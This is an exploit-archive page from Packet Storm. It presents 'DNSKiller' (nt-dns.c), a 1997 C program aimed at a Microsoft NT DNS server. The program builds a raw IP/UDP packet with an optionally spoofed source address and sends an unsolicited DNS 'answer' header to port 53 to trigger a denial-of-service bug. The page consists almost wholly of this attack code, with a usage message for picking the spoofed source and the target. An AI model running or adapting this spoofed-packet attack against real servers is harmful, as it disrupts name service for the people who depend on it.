what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nt-dns.c

nt-dns.c
Posted Mar 13, 2000
Authored by Rikhardur Egilsson | Site hack.co.za

DNSKiller - Demonstrates a bug in Microsoft DNS server.

tags | denial of service
SHA-256 | 9548ccfae869d74f2c33e0f6c9837afdf43d4c5dbdca426b2320812f86650285

nt-dns.c

Change Mirror Download
/****************************************************************************
** DNSKiller
** Demonstrates a bug in Microsoft DNS server.
** Version 0.9-970210 - I don't know if this works.
** (c) 1997 - Rikhardur Egilsson - rikardur@skyrr.is
*****************************************************************************/

#include <string.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

void Usage(char *str) {

printf("Usage: %s [-s <source_host>] -d <dest_host>\n", str);
printf(" <source_host> is an optional spoofed 'from' address.\n");
printf(" <dest_host> is the NT DNS server.\n");
exit(-1);
}


/****************************************************************************
** Use: host = GetHost(name)
** For: 'name' is 0, or points to a ASCIIZ string.
** After: 'host' is the, network byte order, IP number of 'host', if found,
** or 0 if not found.
** If 'name' was 0 'host' represents this host.
*****************************************************************************/
unsigned long int GetHost(char *name) {

char buf[100];
struct hostent *Host;
unsigned long int value;

if(!name) {
gethostname(buf, 100);
printf("Using this host as source..\n");
name=buf;
}

if(!(Host=gethostbyname(name)))
Host=gethostbyaddr(name, strlen(name), AF_INET);
if(!Host) {
printf("Unknown host: %s\n", (name)? name:"<NULL>");
return(0);
}

memcpy(&value, Host->h_addr_list[0], 4);
return(value);
}


/*************************************************************************
** Usage: i=SendUDP(from, to, data, len, socket)
** Fore: 'data' points to first byte of a UDP datagram of 'len' bytes.
** 'from' and 'to' represent IP addresses in network-byte-order.
** 'socket' must be an previously opened RAW_SOCKET.
** After: if i=1, 'data' was sent, via 'socket' as an UDP package to 'to'
** spoofed as originating from 'from'.
** if i!=1, an error occured and no data was send.
*************************************************************************/
int SendUDP(unsigned long int from, unsigned long int to, char *data,
int len, int sock) {

char buf[len+sizeof(struct iphdr)];
struct in_addr host;
struct iphdr *ip=(struct iphdr *)buf;
struct sockaddr_in sin;

sin.sin_family=AF_INET;
sin.sin_addr.s_addr=to;
sin.sin_port=((struct udphdr *)data)->dest;

bzero((void *)buf, sizeof(struct iphdr)+len);
ip->version=4;
ip->ihl=5;
ip->tos=0;
ip->tot_len=htons(sizeof(struct iphdr)+len);
ip->id=htons(0xdead);
ip->frag_off=0;
ip->ttl=255;
ip->protocol=IPPROTO_UDP;
ip->saddr=from;
ip->daddr=to;
/* Note: Checksum will be calculated by the kernel. */

memcpy(buf+sizeof(struct iphdr), data, len);

host.s_addr=(unsigned long int)from;
printf("Sending from: %s -> ", inet_ntoa(host));
host.s_addr=(unsigned long int)to;
printf("to: %s ", inet_ntoa(host));
printf(" %d bytes.\n", len);

return(sendto(sock, buf,len+sizeof(struct iphdr), 0,
(struct sockaddr *)&sin, sizeof(sin)));

}


void CreatePayload(char **Payload, int *len) {

static char buf[sizeof(struct udphdr)+sizeof(HEADER)];
struct udphdr *udp=(struct udphdr *)buf;
HEADER *dns=(HEADER *) (buf+sizeof(struct udphdr));

bzero((void *)buf, sizeof(HEADER)+sizeof(struct udphdr));
udp->source=htons(1111);
udp->dest=htons(53); /* domain */
udp->len=htons(sizeof(struct udphdr)+sizeof(HEADER));
udp->check=0;
dns->qr=1; /* This is an answer */

*len=sizeof(struct udphdr)+sizeof(HEADER);
*Payload=buf;
}


int main(int argc, char *argv[]) {

extern char *optarg;
extern int optind, opterr, optopt;
char c, *source=0, *dest=0, *package;
int sock, len;
unsigned long int from, to;

if((sock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
printf("No raw socket. Who are you ?\n");
exit(-1);
}
setuid(getuid());

while(1) {
c = getopt(argc, argv, "hs:d:");
if( c == -1)
break;
switch(c) {
case 's':
source = optarg;
break;
case 'd':
dest=optarg;
break;
case 'h':
Usage(argv[0]);
break;
default:
Usage(argv[0]);
break;
}
}
if(!dest) {
printf("Huhm, ehrm, didn't we forget something ?\n");
Usage(argv[0]);
}

from=GetHost(source);
to=GetHost(dest);
if(!from || !to) {
printf("Error, can't locate ");
printf("%s host address.\n", (from)? "target":"source");
exit(-1);
}

CreatePayload(&package, &len);
SendUDP(from, to, package, len, sock);

return(0);
}
/* www.hack.co.za */
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close